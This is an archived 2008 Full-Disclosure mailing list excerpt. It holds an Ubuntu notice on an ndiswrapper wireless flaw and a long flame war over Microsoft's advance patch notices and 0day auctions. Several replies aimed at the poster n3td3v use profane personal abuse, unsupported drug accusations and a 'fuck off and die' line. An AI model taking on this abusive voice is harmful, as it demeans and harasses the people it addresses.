Whitehats hate you equally because you just create spam and don't post anything of actual value.

You have your mailing list. Why can't you just stay there until you have anything of value to disclose?
--
// hdw

From kees at ubuntu.com Fri Nov 7 00:47:06 2008
From: kees at ubuntu.com (Kees Cook)
Date: Thu, 6 Nov 2008 16:47:06 -0800
Subject: [Full-disclosure] [USN-662-2] Ubuntu kernel modules vulnerability
Message-ID: <20081107004706.GW9448@outflux.net>

===========================================================
Ubuntu Security Notice USN-662-2 November 06, 2008
linux-ubuntu-modules-2.6.22/24 vulnerability
CVE-2008-4395
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 7.10:
  linux-ubuntu-modules-2.6.22-15-386 2.6.22-15.40
  linux-ubuntu-modules-2.6.22-15-generic 2.6.22-15.40
  linux-ubuntu-modules-2.6.22-15-rt 2.6.22-15.40
  linux-ubuntu-modules-2.6.22-15-server 2.6.22-15.40

Ubuntu 8.04 LTS:
  linux-ubuntu-modules-2.6.24-21-386 2.6.24-21.33
  linux-ubuntu-modules-2.6.24-21-generic 2.6.24-21.33
  linux-ubuntu-modules-2.6.24-21-rt 2.6.24-21.33
  linux-ubuntu-modules-2.6.24-21-server 2.6.24-21.33

After a standard system upgrade you need to reboot your computer to effect the necessary changes.

Details follow:

USN-662-1 fixed vulnerabilities in ndiswrapper in Ubuntu 8.10. This update provides the corresponding updates for Ubuntu 8.04 and 7.10.

Original advisory details:

Anders Kaseorg discovered that ndiswrapper did not correctly handle long ESSIDs. For a system using ndiswrapper, a physically near-by attacker could generate specially crafted wireless network traffic and execute arbitrary code with root privileges.
(CVE-2008-4395)

Updated packages for Ubuntu 7.10:

Updated packages for Ubuntu 8.04 LTS:
3ba0efa186950fc60a1dc3de2e362397 http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-21-sparc64-smp_2.6.24-21.33_sparc.deb Size/MD5: 3185356 02fb1e9baddc9c792ef3e5fd656f44f4 http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-21-sparc64_2.6.24-21.33_sparc.deb Size/MD5: 3177534 08388b20245303eb8bfbbde476afa963 http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/nic-firmware-2.6.24-21-sparc64-di_2.6.24-21.33_sparc.udeb Size/MD5: 1188332 1379b3944196d181d959d61ad4cb39be http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/scsi-firmware-2.6.24-21-sparc64-di_2.6.24-21.33_sparc.udeb Size/MD5: 322528 b559b12e3cbded7d88a0745e3811e8de http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/ubuntu-modules-2.6.24-21-sparc64-di_2.6.24-21.33_sparc.udeb Size/MD5: 362988 e350d0a226b6e1c74f34bf5d59c98b94 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 235 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081106/a9e511ff/attachment.bin From xploitable at gmail.com Fri Nov 7 01:06:47 2008 From: xploitable at gmail.com (n3td3v) Date: Fri, 7 Nov 2008 01:06:47 +0000 Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday In-Reply-To: References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com> <4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com> Message-ID: <4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com> i've been monitoring the scene since 1999 so what do you mean no experience? i make that about 10 years experience if my math is correct. On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee wrote: > Do you even understand why people dont like you? It is because you have all > these crackpot ideas but no experience to back it up. 
All your ideas only > make sense from a theoretical standpoint, but in practicality most will > fail. > > On Fri, Nov 7, 2008 at 11:31 AM, n3td3v wrote: >> >> blackhats like you will always hate on me, so i just ignore the >> negative responses i get. > From waveroad at gmail.com Fri Nov 7 01:20:17 2008 From: waveroad at gmail.com (waveroad waveroad) Date: Thu, 6 Nov 2008 20:20:17 -0500 Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday In-Reply-To: <296a304a0811061719r316bf9afufce1861c9056109b@mail.gmail.com> References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com> <4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com> <4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com> <296a304a0811061719r316bf9afufce1861c9056109b@mail.gmail.com> Message-ID: <296a304a0811061720n168da0f9j93e60724b0fdd4c1@mail.gmail.com> You can be ""monitoring"" the scene since 20 years if you want to, it's not for that your point will be valuable. And actually it is not, also this is about logic. See you're wrong again. Get the fuck out of here. 2008/11/6, n3td3v : > > i've been monitoring the scene since 1999 so what do you mean no > experience? i make that about 10 years experience if my math is > correct. > > > On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee wrote: > > Do you even understand why people dont like you? It is because you have > all > > these crackpot ideas but no experience to back it up. All your ideas only > > make sense from a theoretical standpoint, but in practicality most will > > fail. > > > > > On Fri, Nov 7, 2008 at 11:31 AM, n3td3v wrote: > >> > >> blackhats like you will always hate on me, so i just ignore the > >> negative responses i get. > > > > > _______________________________________________ > Full-Disclosure - We believe in it. 
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
From offbitz at gmail.com Fri Nov 7 01:24:42 2008 From: offbitz at gmail.com (offbitz) Date: Thu, 6 Nov 2008 19:24:42 -0600 Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday In-Reply-To: <4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com> References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com> <4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com> <4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com> Message-ID: <1c89a5ed0811061724p226d1f2eldac7141b51b1b4cb@mail.gmail.com> Dear n3td3v, I sincerely regret to inform you that if all you have done for the past 10 years is "monitor the scene" (i.e. trolling/spamming mailing lists and chatrooms with elementary ramblings) then you have no leg to stand on when somebody questions your experience. In fact, it is quite pitiful. Get a job or something. Sincerely, offbitz On Thu, Nov 6, 2008 at 7:06 PM, n3td3v wrote: > i've been monitoring the scene since 1999 so what do you mean no > experience? i make that about 10 years experience if my math is > correct. > > On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee wrote: > > Do you even understand why people dont like you? It is because you have > all > > these crackpot ideas but no experience to back it up. All your ideas only > > make sense from a theoretical standpoint, but in practicality most will > > fail. > > > > On Fri, Nov 7, 2008 at 11:31 AM, n3td3v wrote: > >> > >> blackhats like you will always hate on me, so i just ignore the > >> negative responses i get. > > >
From xploitable at gmail.com Fri Nov 7 01:34:58 2008 From: xploitable at gmail.com (n3td3v) Date: Fri, 7 Nov 2008 01:34:58 +0000 Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday In-Reply-To: <296a304a0811061720n168da0f9j93e60724b0fdd4c1@mail.gmail.com> References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com> <4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com> <4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com> <296a304a0811061719r316bf9afufce1861c9056109b@mail.gmail.com> <296a304a0811061720n168da0f9j93e60724b0fdd4c1@mail.gmail.com> Message-ID: <4b6ee9310811061734o30d30ab9u99466c42267723ab@mail.gmail.com> so you don't think its logical that these 5 day heads up could be helping the bad guys out? right. i think the world's biggest hackers could do a lot of research in 5 days. but then again n3td3v isn't logical so i must be wrong. damn those drugs eh? i just asked what the realistic possibility was for a 5 day turn around from the day of the heads up until a patch is released. i just thought it was bad that we were giving the bad guys a 5 day head start, but never mind n3td3v isn't logical so i must be wrong. scraping the 5 day head start isn't a good idea because n3td3v isn't logical? right, i threw away 10 years of my life to not be logical... On Fri, Nov 7, 2008 at 1:20 AM, waveroad waveroad wrote: > > You can be ""monitoring"" the scene since 20 years if you want to, it's not > for that your point will be valuable. > And actually it is not, also this is about logic. > > See you're wrong again. > > Get the fuck out of here.
> > > > > > > > 2008/11/6, n3td3v : >> >> i've been monitoring the scene since 1999 so what do you mean no >> experience? i make that about 10 years experience if my math is >> correct. >> >> >> On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee wrote: >> > Do you even understand why people dont like you? It is because you have >> > all >> > these crackpot ideas but no experience to back it up. All your ideas >> > only >> > make sense from a theoretical standpoint, but in practicality most will >> > fail. >> > >> >> > On Fri, Nov 7, 2008 at 11:31 AM, n3td3v wrote: >> >> >> >> blackhats like you will always hate on me, so i just ignore the >> >> negative responses i get. >> > >> >> > >
From ureleet at gmail.com Fri Nov 7 01:31:03 2008 From: ureleet at gmail.com (Ureleet) Date: Thu, 6 Nov 2008 20:31:03 -0500 Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday In-Reply-To: <4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com> References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com> <4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com> <4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com> Message-ID: <6158bb410811061731p562b8058uc1697eb62747e825@mail.gmail.com> thats 9 years u fucking moron. that could NOT have been funnier. most of us on this list have been WORKING in this industry for longer than that. u just sit and rant. take everyones advice, including mine. fucking leave. we dont care about u. microsoft is smarter than u, we are all smarter than u.
microsoft does it for a reason, and u obviously dont understand what that reason is. On Thu, Nov 6, 2008 at 8:06 PM, n3td3v wrote: > i've been monitoring the scene since 1999 so what do you mean no > experience? i make that about 10 years experience if my math is > correct. > > On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee wrote: >> Do you even understand why people dont like you? It is because you have all >> these crackpot ideas but no experience to back it up. All your ideas only >> make sense from a theoretical standpoint, but in practicality most will >> fail. >> >> On Fri, Nov 7, 2008 at 11:31 AM, n3td3v wrote: >>> >>> blackhats like you will always hate on me, so i just ignore the >>> negative responses i get. >> >
From ureleet at gmail.com Fri Nov 7 01:38:31 2008 From: ureleet at gmail.com (Ureleet) Date: Thu, 6 Nov 2008 20:38:31 -0500 Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed? In-Reply-To: <4b6ee9310811031124k48096515jb2866798517aee3a@mail.gmail.com> References: <4b6ee9310811030515la201841rb8f8a261041ad959@mail.gmail.com> <4b6ee9310811031043m475574dai75367d94d9d430a9@mail.gmail.com> <4b6ee9310811031124k48096515jb2866798517aee3a@mail.gmail.com> Message-ID: <6158bb410811061738o53b93db0w3f3bbc1568486da7@mail.gmail.com> no. _u_ are angry. no 1 else. no 1 else gives a shit. On Mon, Nov 3, 2008 at 2:24 PM, n3td3v wrote: > who cares what it means, people are angry, there better be a > government task / strike force being setup for when these offers come > infront of everyone. we can't be complacent about the dangers of these > exploits getting bought by the bad guys. moreover, they shouldn't be > allowed to hold people to ransom when security is at stake.
ultimately > they need to be outlawed, and if they can't be, then second best is a > 24 hour on stand by task /strike force. > > On Mon, Nov 3, 2008 at 6:54 PM, Sandy Vagina wrote: >> And by "lobbying", you mean continuing to whine on the full-disclosure list? >> >> Sandy >> >> On 11/3/08, n3td3v wrote: >>> i'll be lobbying soon to outlaw 0day auctions, this means the banning >>> of 0day sales on the internet. i've noticed an increased level in 0day >>> sales lately on mailing lists, and web sites... i think this should be >>> against the law. let me know what your opinions are on this, so i can >>> form what im going to say when i lobby people about it. cheers. >> >
From biz.marqee at gmail.com Fri Nov 7 01:41:48 2008 From: biz.marqee at gmail.com (Biz Marqee) Date: Fri, 7 Nov 2008 12:41:48 +1100 Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday In-Reply-To: <4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com> References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com> <4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com> <4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com> Message-ID: I have watched movies for 10 years, does this make me an experienced director? No, because watching isn't doing and as such it is not experience. Now please address the issue of your illegal drug use, which demonstrates complete disregard for your governments laws. On Fri, Nov 7, 2008 at 12:06 PM, n3td3v wrote: > i've been monitoring the scene since 1999 so what do you mean no > experience?
i make that about 10 years experience if my math is > correct. > > On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee wrote: > > Do you even understand why people dont like you? It is because you have > all > > these crackpot ideas but no experience to back it up. All your ideas only > > make sense from a theoretical standpoint, but in practicality most will > > fail. > > > > On Fri, Nov 7, 2008 at 11:31 AM, n3td3v wrote: > >> > >> blackhats like you will always hate on me, so i just ignore the > >> negative responses i get. > > >
From ureleet at gmail.com Fri Nov 7 01:44:07 2008 From: ureleet at gmail.com (Ureleet) Date: Thu, 6 Nov 2008 20:44:07 -0500 Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday In-Reply-To: <4b6ee9310811061734o30d30ab9u99466c42267723ab@mail.gmail.com> References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com> <4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com> <4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com> <296a304a0811061719r316bf9afufce1861c9056109b@mail.gmail.com> <296a304a0811061720n168da0f9j93e60724b0fdd4c1@mail.gmail.com> <4b6ee9310811061734o30d30ab9u99466c42267723ab@mail.gmail.com> Message-ID: <6158bb410811061744qe0d743cs5baeea649471bf40@mail.gmail.com> first off, u arent going to get any1 2 change anything. so, lets get that out of the way right there. second of all, in order for u 2 prove ur point, id like 4 u to go to some research of how many exploits have come out during the 5 day period between vague-ass disclosure and patch publish.
then compare and contrast that against how many exploits have come out in the 24 hours following the patch publish after people have had a chance to do bindiffs (u know what that means right white-hat?) against the patches. then, take all that data, draw some charts and graphs, write a whitepaper, and present it somewhere. u know what thats called? research. real ppl do it. u dont. and that is why, u suck. ta ta. On Thu, Nov 6, 2008 at 8:34 PM, n3td3v wrote: > so you don't think its logical that these 5 day heads up could be > helping the bad guys out? right. i think the world's biggest hackers > could do a lot of research in 5 days. but then again n3td3v isn't > logical so i must be wrong. damn those drugs eh? i just asked what the > realistic possibility was for a 5 day turn around from the day of the > heads up until a patch is released. i just thought it was bad that we > were giving the bad guys a 5 day head start, but never mind n3td3v > isn't logical so i must be wrong. scraping the 5 day head start isn't > a good idea because n3td3v isn't logical? right, i threw away 10 years > of my life to not be logical... > > On Fri, Nov 7, 2008 at 1:20 AM, waveroad waveroad wrote: >> >> You can be ""monitoring"" the scene since 20 years if you want to, it's not >> for that your point will be valuable. >> And actually it is not, also this is about logic. >> >> See you're wrong again. >> >> Get the fuck out of here. >> >> >> >> >> >> >> >> >> 2008/11/6, n3td3v : >>> >>> i've been monitoring the scene since 1999 so what do you mean no >>> experience? i make that about 10 years experience if my math is >>> correct. >>> >>> >>> On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee wrote: >>> > Do you even understand why people dont like you? It is because you have >>> > all >>> > these crackpot ideas but no experience to back it up. All your ideas >>> > only >>> > make sense from a theoretical standpoint, but in practicality most will >>> > fail. 
>>> > >>> >>> > On Fri, Nov 7, 2008 at 11:31 AM, n3td3v wrote: >>> >> >>> >> blackhats like you will always hate on me, so i just ignore the >>> >> negative responses i get. >>> > >>> >>> >> >> >
From xploitable at gmail.com Fri Nov 7 02:02:44 2008 From: xploitable at gmail.com (n3td3v) Date: Fri, 7 Nov 2008 02:02:44 +0000 Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday In-Reply-To: <6158bb410811061744qe0d743cs5baeea649471bf40@mail.gmail.com> References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com> <4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com> <4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com> <296a304a0811061719r316bf9afufce1861c9056109b@mail.gmail.com> <296a304a0811061720n168da0f9j93e60724b0fdd4c1@mail.gmail.com> <4b6ee9310811061734o30d30ab9u99466c42267723ab@mail.gmail.com> <6158bb410811061744qe0d743cs5baeea649471bf40@mail.gmail.com> Message-ID: <4b6ee9310811061802r1f9ec795v64c7d72580c09eac@mail.gmail.com> i'm sorry that you don't agree with my heads up theory, i stand by what i said however. i'm sure microsoft don't read full-disclosure anyway, so you're right i'm not going to change anything. by the way, i've noticed you haven't stopped stalking me yet, im a bit concerned about your health. cheers.
On Fri, Nov 7, 2008 at 1:44 AM, Ureleet wrote: > first off, u arent going to get any1 2 change anything. so, lets get > that out of the way right there. > > second of all, in order for u 2 prove ur point, id like 4 u to go to > some research of how many exploits have come out during the 5 day > period between vague-ass disclosure and patch publish. then compare > and contrast that against how many exploits have come out in the 24 > hours following the patch publish after people have had a chance to do > bindiffs (u know what that means right white-hat?) against the > patches. then, take all that data, draw some charts and graphs, write > a whitepaper, and present it somewhere. > > u know what thats called? research. real ppl do it. > > u dont. and that is why, u suck. ta ta. > > On Thu, Nov 6, 2008 at 8:34 PM, n3td3v wrote: >> so you don't think its logical that these 5 day heads up could be >> helping the bad guys out? right. i think the world's biggest hackers >> could do a lot of research in 5 days. but then again n3td3v isn't >> logical so i must be wrong. damn those drugs eh? i just asked what the >> realistic possibility was for a 5 day turn around from the day of the >> heads up until a patch is released. i just thought it was bad that we >> were giving the bad guys a 5 day head start, but never mind n3td3v >> isn't logical so i must be wrong. scraping the 5 day head start isn't >> a good idea because n3td3v isn't logical? right, i threw away 10 years >> of my life to not be logical... >> >> On Fri, Nov 7, 2008 at 1:20 AM, waveroad waveroad wrote: >>> >>> You can be ""monitoring"" the scene since 20 years if you want to, it's not >>> for that your point will be valuable. >>> And actually it is not, also this is about logic. >>> >>> See you're wrong again. >>> >>> Get the fuck out of here. >>> >>> >>> >>> >>> >>> >>> >>> >>> 2008/11/6, n3td3v : >>>> >>>> i've been monitoring the scene since 1999 so what do you mean no >>>> experience? 
i make that about 10 years experience if my math is >>>> correct. >>>> >>>> >>>> On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee wrote: >>>> > Do you even understand why people dont like you? It is because you have >>>> > all >>>> > these crackpot ideas but no experience to back it up. All your ideas >>>> > only >>>> > make sense from a theoretical standpoint, but in practicality most will >>>> > fail. >>>> > >>>> >>>> > On Fri, Nov 7, 2008 at 11:31 AM, n3td3v wrote: >>>> >> >>>> >> blackhats like you will always hate on me, so i just ignore the >>>> >> negative responses i get. >>>> > >>>> >>>> >>> >>> >> >
From biz.marqee at gmail.com Fri Nov 7 04:34:10 2008 From: biz.marqee at gmail.com (Biz Marqee) Date: Fri, 7 Nov 2008 15:34:10 +1100 Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday In-Reply-To: <4b6ee9310811061802r1f9ec795v64c7d72580c09eac@mail.gmail.com> References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com> <4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com> <4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com> <296a304a0811061719r316bf9afufce1861c9056109b@mail.gmail.com> <296a304a0811061720n168da0f9j93e60724b0fdd4c1@mail.gmail.com> <4b6ee9310811061734o30d30ab9u99466c42267723ab@mail.gmail.com> <6158bb410811061744qe0d743cs5baeea649471bf40@mail.gmail.com> <4b6ee9310811061802r1f9ec795v64c7d72580c09eac@mail.gmail.com> Message-ID: Acting like the child that he is, n3td3v continues to ignore questions posed to him. How can he be such an avid debater over the legality of things like metasploit, 0day auctions and similarly themed bullshit threads when he completely disregards drug laws? How do you intend to lobby people to listen to you when you are not a law abiding citizen yourself? You have no credibility in the eyes of the law, so don't psuedo threaten people trying to appear like you have some government backing. You have proven beyond doubt that you dont, because the government doesnt listen to drug taking internet heroes, such as yourself. So enough with the bullshit.. FUCK OFF AND DIE. On Fri, Nov 7, 2008 at 1:02 PM, n3td3v wrote: > i'm sorry that you don't agree with my heads up theory, i stand by > what i said however. i'm sure microsoft don't read full-disclosure > anyway, so you're right i'm not going to change anything. by the way, > i've noticed you haven't stopped stalking me yet, im a bit concerned > about your health. cheers.
> > On Fri, Nov 7, 2008 at 1:44 AM, Ureleet wrote: > > first off, u arent going to get any1 2 change anything. so, lets get > > that out of the way right there. > > > > second of all, in order for u 2 prove ur point, id like 4 u to go to > > some research of how many exploits have come out during the 5 day > > period between vague-ass disclosure and patch publish. then compare > > and contrast that against how many exploits have come out in the 24 > > hours following the patch publish after people have had a chance to do > > bindiffs (u know what that means right white-hat?) against the > > patches. then, take all that data, draw some charts and graphs, write > > a whitepaper, and present it somewhere. > > > > u know what thats called? research. real ppl do it. > > > > u dont. and that is why, u suck. ta ta. > > > > On Thu, Nov 6, 2008 at 8:34 PM, n3td3v wrote: > >> so you don't think its logical that these 5 day heads up could be > >> helping the bad guys out? right. i think the world's biggest hackers > >> could do a lot of research in 5 days. but then again n3td3v isn't > >> logical so i must be wrong. damn those drugs eh? i just asked what the > >> realistic possibility was for a 5 day turn around from the day of the > >> heads up until a patch is released. i just thought it was bad that we > >> were giving the bad guys a 5 day head start, but never mind n3td3v > >> isn't logical so i must be wrong. scraping the 5 day head start isn't > >> a good idea because n3td3v isn't logical? right, i threw away 10 years > >> of my life to not be logical... > >> > >> On Fri, Nov 7, 2008 at 1:20 AM, waveroad waveroad > wrote: > >>> > >>> You can be ""monitoring"" the scene since 20 years if you want to, it's > not > >>> for that your point will be valuable. > >>> And actually it is not, also this is about logic. > >>> > >>> See you're wrong again. > >>> > >>> Get the fuck out of here. 
> >>> > >>> > >>> > >>> > >>> > >>> > >>> > >>> > >>> 2008/11/6, n3td3v : > >>>> > >>>> i've been monitoring the scene since 1999 so what do you mean no > >>>> experience? i make that about 10 years experience if my math is > >>>> correct. > >>>> > >>>> > >>>> On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee > wrote: > >>>> > Do you even understand why people dont like you? It is because you > have > >>>> > all > >>>> > these crackpot ideas but no experience to back it up. All your ideas > >>>> > only > >>>> > make sense from a theoretical standpoint, but in practicality most > will > >>>> > fail. > >>>> > > >>>> > >>>> > On Fri, Nov 7, 2008 at 11:31 AM, n3td3v > wrote: > >>>> >> > >>>> >> blackhats like you will always hate on me, so i just ignore the > >>>> >> negative responses i get. > >>>> > > >>>> > >>>> > >>> > >>> > >> > > >
From xploitable at gmail.com Fri Nov 7 04:46:36 2008 From: xploitable at gmail.com (n3td3v) Date: Fri, 7 Nov 2008 04:46:36 +0000 Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday In-Reply-To: References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com> <4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com> <4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com> <296a304a0811061719r316bf9afufce1861c9056109b@mail.gmail.com> <296a304a0811061720n168da0f9j93e60724b0fdd4c1@mail.gmail.com> <4b6ee9310811061734o30d30ab9u99466c42267723ab@mail.gmail.com> <6158bb410811061744qe0d743cs5baeea649471bf40@mail.gmail.com> <4b6ee9310811061802r1f9ec795v64c7d72580c09eac@mail.gmail.com> Message-ID: <4b6ee9310811062046l5cbe5789ja60fb1efa5df0143@mail.gmail.com> you seem like an hd moore/metasploit fan boy pissed off that i don't respect him or like his metasploit software. n3td3v doesn't respect people like the sheep do, i think for myself, have opinions about other white hats that may not be in support of them. get used to it bozo. On Fri, Nov 7, 2008 at 4:34 AM, Biz Marqee wrote: > Acting like the child that he is, n3td3v continues to ignore questions posed > to him. How can he be such an avid debater over the legality of things like > metasploit, 0day auctions and similarly themed bullshit threads when he > completely disregards drug laws? How do you intend to lobby people to listen > to you when you are not a law abiding citizen yourself? You have no > credibility in the eyes of the law, so don't psuedo threaten people trying > to appear like you have some government backing. You have proven beyond > doubt that you dont, because the government doesnt listen to drug taking > internet heroes, such as yourself. > > So enough with the bullshit.. FUCK OFF AND DIE.
> > > On Fri, Nov 7, 2008 at 1:02 PM, n3td3v wrote: >> >> i'm sorry that you don't agree with my heads up theory, i stand by >> what i said however. i'm sure microsoft don't read full-disclosure >> anyway, so you're right i'm not going to change anything. by the way, >> i've noticed you haven't stopped stalking me yet, im a bit concerned >> about your health. cheers. >> >> On Fri, Nov 7, 2008 at 1:44 AM, Ureleet wrote: >> > first off, u arent going to get any1 2 change anything. so, lets get >> > that out of the way right there. >> > >> > second of all, in order for u 2 prove ur point, id like 4 u to go to >> > some research of how many exploits have come out during the 5 day >> > period between vague-ass disclosure and patch publish. then compare >> > and contrast that against how many exploits have come out in the 24 >> > hours following the patch publish after people have had a chance to do >> > bindiffs (u know what that means right white-hat?) against the >> > patches. then, take all that data, draw some charts and graphs, write >> > a whitepaper, and present it somewhere. >> > >> > u know what thats called? research. real ppl do it. >> > >> > u dont. and that is why, u suck. ta ta. >> > >> > On Thu, Nov 6, 2008 at 8:34 PM, n3td3v wrote: >> >> so you don't think its logical that these 5 day heads up could be >> >> helping the bad guys out? right. i think the world's biggest hackers >> >> could do a lot of research in 5 days. but then again n3td3v isn't >> >> logical so i must be wrong. damn those drugs eh? i just asked what the >> >> realistic possibility was for a 5 day turn around from the day of the >> >> heads up until a patch is released. i just thought it was bad that we >> >> were giving the bad guys a 5 day head start, but never mind n3td3v >> >> isn't logical so i must be wrong. scraping the 5 day head start isn't >> >> a good idea because n3td3v isn't logical? right, i threw away 10 years >> >> of my life to not be logical... 
>> >> >> >> On Fri, Nov 7, 2008 at 1:20 AM, waveroad waveroad >> >> wrote: >> >>> >> >>> You can be ""monitoring"" the scene since 20 years if you want to, >> >>> it's not >> >>> for that your point will be valuable. >> >>> And actually it is not, also this is about logic. >> >>> >> >>> See you're wrong again. >> >>> >> >>> Get the fuck out of here. >> >>> >> >>> >> >>> >> >>> >> >>> >> >>> >> >>> >> >>> >> >>> 2008/11/6, n3td3v : >> >>>> >> >>>> i've been monitoring the scene since 1999 so what do you mean no >> >>>> experience? i make that about 10 years experience if my math is >> >>>> correct. >> >>>> >> >>>> >> >>>> On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee >> >>>> wrote: >> >>>> > Do you even understand why people dont like you? It is because you >> >>>> > have >> >>>> > all >> >>>> > these crackpot ideas but no experience to back it up. All your >> >>>> > ideas >> >>>> > only >> >>>> > make sense from a theoretical standpoint, but in practicality most >> >>>> > will >> >>>> > fail. >> >>>> > >> >>>> >> >>>> > On Fri, Nov 7, 2008 at 11:31 AM, n3td3v >> >>>> > wrote: >> >>>> >> >> >>>> >> blackhats like you will always hate on me, so i just ignore the >> >>>> >> negative responses i get. >> >>>> > >> >>>> >> >>>> >> >>>> _______________________________________________ >> >>>> Full-Disclosure - We believe in it. >> >>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> >>>> Hosted and sponsored by Secunia - http://secunia.com/ >> >>> >> >>> >> >>> _______________________________________________ >> >>> Full-Disclosure - We believe in it. >> >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> >>> Hosted and sponsored by Secunia - http://secunia.com/ >> >>> >> >> >> >> _______________________________________________ >> >> Full-Disclosure - We believe in it. 
>> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> >> Hosted and sponsored by Secunia - http://secunia.com/
>> >>
>> >
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>

From biz.marqee at gmail.com Fri Nov 7 05:09:55 2008
From: biz.marqee at gmail.com (Biz Marqee)
Date: Fri, 7 Nov 2008 16:09:55 +1100
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <4b6ee9310811062046l5cbe5789ja60fb1efa5df0143@mail.gmail.com>
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>
 <4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com>
 <296a304a0811061719r316bf9afufce1861c9056109b@mail.gmail.com>
 <296a304a0811061720n168da0f9j93e60724b0fdd4c1@mail.gmail.com>
 <4b6ee9310811061734o30d30ab9u99466c42267723ab@mail.gmail.com>
 <6158bb410811061744qe0d743cs5baeea649471bf40@mail.gmail.com>
 <4b6ee9310811061802r1f9ec795v64c7d72580c09eac@mail.gmail.com>
 <4b6ee9310811062046l5cbe5789ja60fb1efa5df0143@mail.gmail.com>
Message-ID:

I could care less about metasploit, all it does is help the kiddies.. but
that doesnt mean it should be illegal. Software is knowledge and knowledge
should be free, but that is not the issue here. The issue is that you are a
bullshitting drug abuser who's child like demeanor wont allow him to even
acknowledge bad things written about him. You are performing the internet
equivalent of sticking your fingers in your ears and yelling "nana i cant
hear you" in an attempt to make the situation go away.

So you unknowledgable, untalented, unemployed junkie.. do you have anything
relevant to what I asked to contribute or are you going to just ignore it
like the pussy that you are?

Also, dont try and portray yourself like a free thinking martyr...
your opinions are just rehashed idea sparked off cnet news comments and various
other sources of "security information". Anyone who knows even the slightest
thing about information security knows you and your idealist views are a
joke.

On Fri, Nov 7, 2008 at 3:46 PM, n3td3v wrote:
> you seem like an hd moore/metasploit fan boy pissed off that i don't
> respect him or like his metasploit software. n3td3v doesn't respect
